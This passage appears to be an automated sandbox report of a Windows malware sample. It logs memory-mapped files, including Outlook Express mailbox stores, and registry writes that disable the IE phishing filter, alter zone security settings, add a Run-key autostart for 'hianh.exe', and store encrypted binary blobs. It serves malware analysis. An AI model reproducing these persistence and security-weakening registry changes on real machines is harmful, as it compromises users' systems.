\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare query and write and read and execute and extend size unknown 2FE0000 77824 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare query and write and read commit 3010000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read and execute and extend size unknown 3010000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read commit 3020000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read and execute and extend size unknown 3020000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read commit 3030000 77824 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 3050000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 3050000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 3050000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 3050000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
none query and write and read commit 30D0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\mshtml.dll write and read and execute commit 30F0000 5963776 own pid execute success or wait 1
C:\WINDOWS\system32\mshtml.dll write and read and execute commit 30F0000 5963776 own pid execute success or wait 1
C:\WINDOWS\system32\mshtml.dll query and write and read and execute image 3CEA0000 5976064 own pid read write success or wait 1
\KnownDlls\msls31.dll write and read and execute unknown 3CEA0000 5976064 own pid read write object name not found 1
C:\WINDOWS\system32\msls31.dll query and write and read and execute image 30F0000 167936 own pid read write conflicting addresses 1
\BaseNamedObjects\#MSHTML#PERF#00000664 write unknown 30F0000 167936 own pid read write object name not found 1
none query and write and read commit 3160000 12288 own pid read write success or wait 1
none query and write and read commit 31A0000 12288 own pid read write success or wait 1
none query and write and read commit 31E0000 12288 own pid read write success or wait 1
none query and write and read commit 3220000 12288 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL write and read and execute commit 3220000 7569408 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL query and read commit 3220000 7569408 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL write and read and execute commit 3220000 7569408 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL query and read commit 3220000 7569408 own pid readonly success or wait 1
\BaseNamedObjects\Local\!PrivacIE!SharedMem!Counter query and write and read commit 3220000 4096 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3120000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3120000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3120000 4096 own pid readonly success or wait 1
\KnownDlls\PSAPI.DLL write and read and execute unknown 3120000 4096 own pid readonly object name not found 1
C:\WINDOWS\system32\psapi.dll query and write and read and execute image 76BF0000 45056 own pid read write success or wait 1
\NLS\NlsSectionCP28591 read unknown 76BF0000 45056 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read and execute and extend size unknown 76BF0000 45056 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read commit 3160000 143360 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare query and write and read and execute and extend size unknown 3160000 143360 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare query and write and read commit 3010000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap query and write and read and execute and extend size unknown 3010000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap query and write and read commit 3020000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare query and write and read and execute and extend size unknown 3020000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare query and write and read commit 3040000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read and execute and extend size unknown 3040000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read commit 30D0000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read and execute and extend size unknown 30D0000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read commit 3120000 77824 own pid read write success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\MPS56.tmp query and write and read and execute and extend size commit 2EF0000 180224 own pid readonly success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 2850000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 2850000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\MPRAPI.dll write and read and execute unknown 76FB0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\mprapi.dll query and write and read and execute image 76D40000 98304 own pid read write success or wait 1
\KnownDlls\ACTIVEDS.dll write and read and execute unknown 76D40000 98304 own pid read write object name not found 1
C:\WINDOWS\system32\activeds.dll query and write and read and execute image 77CC0000 204800 own pid read write success or wait 1
\KnownDlls\adsldpc.dll write and read and execute unknown 77CC0000 204800 own pid read write object name not found 1
C:\WINDOWS\system32\adsldpc.dll query and write and read and execute image 76E10000 151552 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2890000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image 2890000 12288 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 3430000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 2890000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 2890000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 2890000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 2890000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 2890000 389120 own pid readonly success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy CleanCookies Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D E7 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} String "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} String "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 154 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci Binary C9 AB 5E 55 DA 26 82 2F 4E DD F6 8A BA 2B AF D4 47 12 B4 F7 9C 4E 33 A6 B5 91 12 6A 9D 00 42 87 D5 EF DB 53 1E AA 37 10 99 7C 93 77 F5 53 4F E1 FD 38 2F A5 38 17 6F 96 8E 75 8A 56 83 BE D0 5F 29 9C 0A 2C DF F7 6B 20 FF 4B 95 65 73 8A AA 94 55 98 A5 8C 27 68 47 82 6C D7 4D 11 0B 51 6E 6F 59 F0 C8 8A 60 5E 7A 40 1C 04 2D D4 B6 B7 B6 C9 D0 AE 0F 66 CA 58 7E BA D8 4E CD CD FA 72 AB EF 1D 4E BC FE 49 E0 42 E6 10 4E B9 32 BC 54 2E 85 67 35 6A 2F 0A 3F E4 EE 44 4A EA 0A 00 A9 D9 22 37 85 0A CB 44 F8 15 DE CC 30 09 E9 DA 51 9E 03 68 43 21 DA 03 5F 95 7C 82 EF 40 9B D0 18 D3 C0 64 77 45 34 E1 72 F3 F4 52 2E C7 6B 38 EB 29 18 FC DE 3F 7C A0 75 48 3D 5C 7C CB AF 2D A0 B1 DE 00 B5 4A 9C 1F DD AF 0C 18 C5 60 C5 9C 57 A7 B8 1A 08 F9 0E 45 D8 BB 3D FC 4B F6 A6 22 53 3A 5D 0C B5 FA 68 81 DB 5D 01 DF D1 5A D0 0A 3B 10 56 01 92 82 0B CE 33 E2 DA 7C D2 3C 76 16 5A 14 15 D8 53 CA 3C EE 68 46 1C 3F 34 62 67 71 09 FB D8 28 DE 8F AD 50 62 09 5B 77 A7 F4 B1 7E 2E E2 5C 53 93 D6 B7 C2 73 1B D0 8C FE E4 6D CD DB 97 F3 8F AB A4 62 A2 E1 E4 03 13 8B CA AE 83 54 B4 23 98 0C A7 0C 77 71 67 32 28 F4 0B 2F 6A 49 B9 EF 36 23 D8 E4 9B 67 6A F3 AF 57 D0 B8 B4 72 11 7B DD 25 03 9B 23 D7 CC 82 37 1B 74 55 0E 5E 8E A7 68 B5 6D 79 62 5E 33 0A E1 1E DE 02 2D ED F2 13 45 19 E3 CA 1F 50 3B 36 80 3F BA 70 11 E0 17 19 AB 4F 89 D8 38 78 86 85 CD 0D 09 18 80 19 3B D9 4B D6 B7 DA 3D E1 38 A8 91 44 51 62 F2 55 16 A7 9A 8F AF 12 7A 5B 72 1C BA 80 C5 FD 5A 72 0D 7E 5D 4B C1 E9 EA EB F8 2F E9 40 99 1D BD 65 F6 FA D6 D0 A6 5A 28 FE 1C 75 00 CB 81 0E 3E D0 CA 2E 6B 1D 8D DF 86 A5 E4 A5 39 9B 8E 0C 21 92 33 F6 43 39 E0 48 0E 74 11 CC F2 B0 17 C4 D0 57 52 79 9D 18 37 D4 FE C2 3C 2A 6A AC BF DE 04 C8 86 A5 98 16 F1 D4 99 00 FB 8B D3 51 72 D4 A8 B3 BB A0 F7 C2 14 8F 97 D7 F2 3D 43 AC 25 BD 6B 20 34 6C 46 AD 47 E7 1C 63 E7 53 1A 02 AF 45 39 62 96 DB 2A 70 C1 B8 B3 B6 C5 C9 CE 3A A9 41 CD 90 BF 1F C6 94 A7 43 A3 65 01 D8 F5 54 96 46 EE 35 E7 DE 44 DC 12 45 03 C2 99 59 27 62 08 C7 AC 98 C8 C7 0B BF CD E9 73 DD 0F D4 4D 5B 14 09 F5 14 FA 41 03 4E 09 8B 2A 3A 2E 1C DB D4 9F 5C 95 7F 2C D7 33 28 EA 8B 82 F5 8A 33 DC 0F DE 60 66 F0 FE D8 26 69 4C 6F 16 DF EA 02 0C CB 6E 63 38 C4 F5 CE B5 DA 3F 8B 5F DD CC 4E 2C 85 C3 B9 51 BC 6D 17 1D A3 2E 23 1E 41 39 BD 07 FF 64 53 02 97 B6 D7 C8 DF D0 0E DC 3B F6 1F A0 AA 2F BE DB 75 78 61 66 6B CD 9E 41 40 F0 7B A7 F4 A3 F5 34 6B 8A A2 7A 01 AF 8B 1D 93 91 62 FA 8C 92 B1 9C 25 98 6D 21 C9 F7 EC 3E C2 9D 4E 8C 8B 71 D1 84 9E 68 D2 EC A3 4F CC 0F 65 38 D2 F7 11 61 58 04 20 4B 9F A8 19 0C 25 2F BE DD 17 53 35 BD D8 4C 3C B3 38 C7 BA E9 D0 25 80 9C 7F A6 B7 B8 12 E8 6B A6 E5 4F F7 A2 22 23 27 A4 93 A0 CA 1B 0B 74 D3 CB F5 2B 87 E0 40 9D E8 BD 81 29 59 C5 7D 4C 07 31 CE A4 99 5B DD 12 AA D6 B9 50 95 1D D3 A5 D4 D2 4D 47 55 5F 39 79 7C A4 26 00 EF EF 85 9C 43 F3 03 CC EE 26 F3 90 D5 93 62 52 4F 16 F9 37 89 0F B1 88 FA 5B 71 79 C6 DC E9 7F 79 27 59 D8 98 AA 85 67 DA 4C 5C 99 D5 E6 99 54 94 31 D6 08 15 9F 50 C4 22 51 9D 01 2E B2 60 F0 EF AE FC D8 10 E1 D4 DE BD 2B 82 2A 29 EF 68 AA 78 44 0E 19 B3 88 B6 03 0E B7 2E 76 58 12 1A D7 5B 30 22 95 E9 F0 66 58 C3 D2 F6 6C 69 83 C5 35 80 FC 56 2C 5E 28 23 C4 0C B0 F3 3B EA E1 3B DF B4 B4 28 E7 56 A0 F6 90 57 EF 19 AC EC 15 BD 7B 31 95 BC C8 9E 89 5D AF 19 62 92 BC E4 CE E5 D0 0F 22 72 A6 04 C1 6E F6 E2 10 EB 0A 7D 04 0E DE 1E E1 B2 9C 82 69 56 69 4F 27 4C A0 FF D6 52 30 E9 3E 33 60 27 2E A8 57 26 E9 6E 9A 4E 04 94 E4 9F C7 5B 1C 09 6F 61 36 78 8F C7 3A A7 A6 A9 C2 B2 A9 F2 D0 BA 24 12 46 2E AD 0B 34 01 79 ED C8 E6 41 10 FE 58 58 C9 8D A4 9A B0 16 B1 00 EF 98 B9 6C C9 44 A7 90 0D 63 93 4E 2E 46 49 08 FF 26 17 8C 7B 08 40 25 29 81 3A 5C 75 04 92 EC B8 3A 40 7B C8 EA F7 6B FC B3 7D 01 A6 7C A6 4D 28 4D 5A 9D 92 1A 59 79 F5 89 AE 3B 72 FE 99 2A 93 E7 BB 04 A3 6C 31 17 15 76 CE 9E 2A 9C 8C 47 28 23 AB 14 7F 27 3C C2 57 AF D3 A2 B4 7D EF E0 57 CA 32 94 FA F4 E1 1D 19 FE BA 6B 3C 7E 14 F6 EB 4A 32 DA 65 35 82 A0 0B 5E D2 32 EB BD 06 7A 0E B6 26 85 D5 A1 22 80 05 82 D1 3B C5 52 83 A8 F0 8C 35 AE 11 4A 1B 39 34 2B 3B C0 D8 31 C1 0B AE 21 50 47 96 90 76 AD 9F EB 83 9B 12 90 C3 C3 B6 81 E0 DB 01 EC AD 06 66 CE BE 63 AC A5 6A F2 90 6D 4A 24 34 B0 B7 24 73 F4 CE A3 28 BF 58 BD A2 8E 25 CA 0D FF 45 5E 1D 33 5B 4D B0 11 A6 B6 88 12 AE EF 7D EA B1 FE FD 98 3C B7 AF 89 A7 9C 98 8B BE 58 AE 02 43 35 22 72 28 96 50 00 1A 7E 81 EE 91 3E 6B 3D 6F BF B7 D3 BC 7B 84 DB 15 A8 5C 87 F4 EF 5E EA 60 80 A9 33 CE E1 16 2C 1F C1 3E 52 F9 12 06 4F 34 F9 E1 74 9F 3D 70 10 5F 0C 16 1A 52 0F 12 E7 E9 B1 A7 A4 64 3B 82 27 83 79 44 90 DA 81 45 3E 67 3A 65 A8 E4 9E B7 8D 8D 5D 7A 28 13 64 09 64 8B F0 FF 3C 54 AB 6F 65 FA F2 E8 27 10 FF 39 4E 4A D4 63 21 69 1A F7 97 98 F0 67 BC CE 43 86 E1 41 E6 71 E1 29 88 3D 3D 2F CD 30 1D 2A F2 DD 47 A6 AB CF AF 45 96 3A D8 27 C8 5F 53 AC 8E 76 FE 56 6C 7D 5A 2F 08 15 A7 B6 3C 00 31 E8 63 6F 78 F4 2D 4B 20 DF 27 7B 6C C5 58 02 32 29 93 D2 58 F2 89 84 A8 3E 75 DE 27 FF 89 09 EC 47 F7 6D D3 02 9E 82 E3 27 22 62 F1 C0 06 40 AF 0E 18 C9 EB 8F 70 DA 1B 4B 22 79 23 E1 B3 04 26 9D AC 15 DE 4C 1A 05 17 16 3B BF F4 5C 98 F0 63 77 F2 74 E1 3F F5 60 AB 03 67 4C DB 42 38 A8 60 83 FE 62 44 92 D6 C6 5A A4 F6 2C 5F 16 FE 1B 56 2D 17 74 A3 90 E8 AB 5C 27 38 A1 1C 94 74 8C 14 7A D9 89 E2 69 91 7C 82 42 F1 0B 81 1D 2A 72 8F 21 E2 11 F1 BA 60 92 AE 87 54 4B 30 EB A0 A9 AF 6E 74 60 78 E9 56 C3 DA 75 E8 D6 6A 6A 8C CE D2 C8 46 43 C5 E2 CA D1 2D 79 5B 98 3D D1 58 D3 7A 03 E4 2C 56 1B D2 AA 74 59 17 98 47 D3 76 91 7B ED C1 D3 75 1D 15 8C C7 88 DB CB CF E8 AE 7C 34 99 54 B2 3B 51 6E 7F 05 41 C1 58 98 33 74 89 12 FE 9A 52 D7 B1 4F 58 CA 10 F2 7E 03 40 1E 09 D1 83 CB 4A 40 2B E0 6D C4 5C F1 BA EF 2B 30 6E 4A 59 39 01 20 9A A5 72 F6 D2 45 DF BC 9D 42 47 03 BA BB EC 2C 09 62 97 4C F4 F2 F4 4B A0 E8 67 82 FF BE 89 52 F1 D9 F1 74 55 11 23 A2 5C F6 B3 74 F8 14 87 73 91 C4 63 64 85 C0 6D C0 0B ED 71 E8 65 F0 C2 8E 44 AD DE EB 28 2F 67 A9 8B 9F FF C7 AC BD CF 79 4A DE C2 4A 9B 51 F7 3B F1 F2 D7 C6 BE 7F 29 71 7B 85 D7 B1 75 E2 11 33 1C 17 56 21 C0 F2 76 47 02 2E 40 81 84 50 B5 BE E2 24 60 35 17 25 C9 DD 41 87 51 20 61 55 B7 D7 7A 9D 23 0E 4F B4 A9 7C 2D C8 83 98 07 B1 4D 54 AB 8E 83 33 D9 04 EF EE 1D E2 2D A8 CC 98 5E 0B BD 80 9F 4C A4 09 75 94 16 86 F0 2A 9B 1C D8 1D C8 86 AE 84 2F 06 DE 60 08 68 93 B9 A3 75 92 9A FC EC D0 02 F7 77 0C 82 EF 49 65 9F 0B D3 FB 0D 20 4B BC B7 DB 98 20 9F 19 EF D1 B3 9A F0 E5 83 4C 4F AD CC 1D A9 3A EE E5 79 4F 70 82 44 7A 7F 29 E3 B1 E5 81 86 35 B2 24 19 8D 9C 52 DC AB 44 20 F4 FA 51 00 0C 6C C0 62 7C 29 5A AA DE 54 DA 24 A1 76 26 3E 57 17 EE 48 A8 58 4A 47 35 70 D1 BB DC 9A 9E D6 5C B8 53 3C 35 5C 45 2A 7B BD 7C 1F 17 90 E6 48 00 B9 4E 89 49 B9 32 3E 22 30 73 ED 65 BA 5C 21 44 26 B0 45 78 F3 FA 81 A8 BB C6 8D 51 ED C5 45 50 CA E8 F2 F1 C9 D1 AB F2 59 EB 46 61 ED E9 5E 33 88 BC 39 99 48 EE CE 58 6D 62 74 88 E5 71 E8 FB 26 31 86 05 28 18 1A 7B 66 10 81 9C 1E E5 64 79 5A 47 EA D8 84 96 A7 5D E5 78 BC 98 68 D4 3D 0B 81 28 EB 2E 4B 73 DC 32 9D E9 DA 24 BE AE 6C 7A F9 E0 8C D9 C5 1C BF B1 DC 2F 65 94 E0 A9 0D 53 C0 11 5E 6D 5B BF 09 1E 60 7B C7 8D 3E 8A FA 2B D7 9F 77 9D 12 DB 07 74 25 18 94 3F DB 17 E0 43 86 6B 4B B5 03 E5 08 D2 13 D4 EB 79 4B 23 94 41 2C BD A0 24 5A C4 30 79 0D C3 6B 7B 81 DD F5 34 BC 5E CA 58 87 57 06 91 A9 50 80 DE 6E FE 95 3E 36 64 7C F5 71 50 6D 0C 7E EB B9 B8 13 AC 65 99 76 4A 26 E2 64 52 C6 42 2B 38 28 1F E1 D7 BB B6 39 73 3D 25 C8 1B 63 B6 22 F7 6F EC A8 79 F1 90 CE 4A AE 55 C5 8D 89 E7 F5 A6 36 3A 25 A8 D4 E5 64 37 26 CB 16 BE 57 B9 DB E6 EA 81 3A A9 7B 91 F7 6B 8A 27 0A AA AF F4 6A D1 59 17 F0 D1 CE BC 3D E8 BD 88 30 92 66 08 AA 48 D8 EF 5E DF AE A7 ED 9F 59 20 DC 2C 3E DA 53 D4 CB 6A C5 ED 8F B9 EC B0 E5 69 59 64 9E 8A E3 AD 9E ED D3 C1 FA F3 78 FE 15 94 B3 76 97 E7 AE 90 16 94 06 2D B2 52 E0 96 96 98 E2 7F 94 71 F7 EB 5D 0F 47 60 C0 86 B9 A8 6B 87 C5 E3 A0 94 37 6B 63 A2 B0 A0 4B 38 D6 D1 9E 2B 9F 6E 5A 6A 5B CC E9 E2 69 90 1E 93 2C 11 65 7D 95 E0 46 05 4B 6D 6B 3D F6 55 1A C4 47 69 A6 BC 39 5B 6B 9E 60 01 37 FD BB E1 B7 CD BA 36 DA 05 D8 04 F7 34 4B C1 6C E5 C9 A0 6A 86 A6 66 43 FF 75 08 08 03 CF 10 A5 83 1E F9 B1 93 8F C8 9A CC 65 07 51 B8 4D 5E C4 DE 84 B7 A2 69 13 DF 39 23 C6 18 32 B7 8D D5 89 0B 82 08 22 9E 10 14 8D 51 B5 84 61 DC C9 55 16 15 54 99 45 CA 64 02 86 50 23 8A ED 36 7F F6 25 72 17 A4 A8 F1 2B 7E AD 2E DE 6C 17 1E 77 40 13 57 48 92 3B B5 4E A6 EA AA 60 DB 6C 9B B4 58 53 62 46 2A 8F 20 C5 D7 A9 0D 5F 70 64 BE 45 89 3D ED 7C 4A 19 5A BD F7 0A 70 50 B1 3A 6D C8 98 51 54 45 3F D0 72 E5 67 5C ED A7 51 B8 6D 39 06 E5 05 0F A5 65 D7 30 49 A2 13 6E A3 E3 F9 83 5B 90 71 26 AF F8 CA 66 27 DA 9D 5F AC A6 AE CF 1B C5 B9 41 C9 95 79 9D 1D 55 FC 27 3D 6E 66 46 72 60 3B 28 D9 F1 DA ED EF 97 FB E1 BA FD 11 51 D1 EC 8E 1C 29 C7 12 1A 16 0B 39 8B 5B 3E FB 9E 8F 43 C0 0B F4 1A A8 A1 43 11 DA D4 53 AC FA CA 0B 6E 00 B5 F7 57 E1 6C 5B 4C EA 1B 3D CF E6 1B 54 DF 55 3F AA EA 44 6D 02 64 20 CD 78 F4 B6 C5 FF 82 8A B4 68 D5 2C 2A C4 94 6E 0C 8B B6 51 64 15 A6 9E D4 BB 2B 78 54 E1 51 78 94 0F AB 18 83 37 E8 62 12 74 8D E3 C2 61 46 D2 D9 6D 92 86 31 4C 34 D7 97 07 64 3B 9A BB 07 FE 7A C6 2F 29 AC 22 13 FC 0F 25 46 6D 2D 9B 4B 48 B8 DB 99 F7 6F 6D F8 2F B4 DF BD 38 A5 F6 84 A7 6B 17 77 22 F6 41 B9 8C CF F6 8B 2C F0 8E A6 98 4B 9C 67 31 1C 0E 36 A4 12 04 63 3D A6 B7 8E 33 8F E3 A1 90 8C 5D ED 70 E8 96 08 A5 CE 1D 08 FC 6C D7 F2 03 17 8F 05 F9 D6 83 C7 BE 8F 72 30 A0 C7 A0 AB 17 84 D8 03 D1 14 20 AB F4 09 06 5D FF 64 9F CE CA EC 5F 39 60 84 15 A7 70 D8 CF 82 A0 A6 DD 13 0E 9A F0 F9 D4 AB E0 F5 F6 F7 60 26 70 36 06 18 23 D4 96 06 D2 58 AD 97 C7 48 28 27 91 B7 81 8A 2E 5B 7E 04 74 9A 4E 73 AB 1E 16 36 6A 9B F0 74 BA A1 62 C7 37 9E B8 0D 13 50 17 09 53 29 8A E1 26 CE 2C 23 C6 BF A0 01 42 C0 67 84 81 94 74 F5 C4 66 A3 1E EC 3A B0 B1 C8 17 BF E5 DC EB 60 CC F1 94 90 6D 80 2E 9A 78 36 01 AE 4A CD 3D F8 D6 34 27 DC 06 12 18 A0 F3 0C 3B 1E 73 EC 54 5E A9 06 D5 F0 8A 2A B1 13 CF 8D 0C B4 FC 71 8D 8F 67 44 97 56 0D C8 2E FD 5F 69 51 B4 42 D7 75 4F 54 F0 F7 A1 6D F6 0B 9A 76 57 16 47 6F 12 CB A7 BB DA 36 C3 62 45 01 3B 89 AD A5 DA 87 56 CB 68 38 1E 06 C3 AC 2A 90 38 26 2D 0E 84 04 08 A4 E1 D9 9E 8C 78 E4 DB EA A4 6F BF F8 4F 10 93 1F DC F8 84 7F 5A CB 62 B6 4E 3A 16 E0 CE 4D 19 91 05 2B D6 54 F4 CF 4F 3B C8 B0 E0 AE EA B1 1F 3A 89 40 52 AF 07 D6 70 AF 0E 51 55 5F 1F D2 C0 B9 F9 ED 83 11 77 EB E8 5E 3A C6 F0 12 67 24 E5 2E C7 56 87 A9 44 8E 5A 92 F2 FD B1 49 F8 DD 1D 7C 3D E1 5C B2 B0 31 28 21 1B 8D F1 F6 FD 1E 8D B2 35 50 7C D3 A1 5C 8B 81 7B 52 FF 3B 9A 00 A2 FA 4D 82 B7 6C 4A 16 65 64 BF C8 62 08 C9 4B 09 3F 5C 7D DB 65 1F 9A 29 45 57 DB DD 50 01 40 37 EB 60 B9 5A 2E CA 0F F6 B8 E3 95 EF 95 F1 EC 61 3D F2 71 8A 75 F1 67 B9 EB 20 52 E3 83 56 E8 94 E2 55 F2 2C 57 7B 31 06 89 B2 25 9B B5 38 3E B9 A7 8B 95 CD 19 1F 7E B5 6D 07 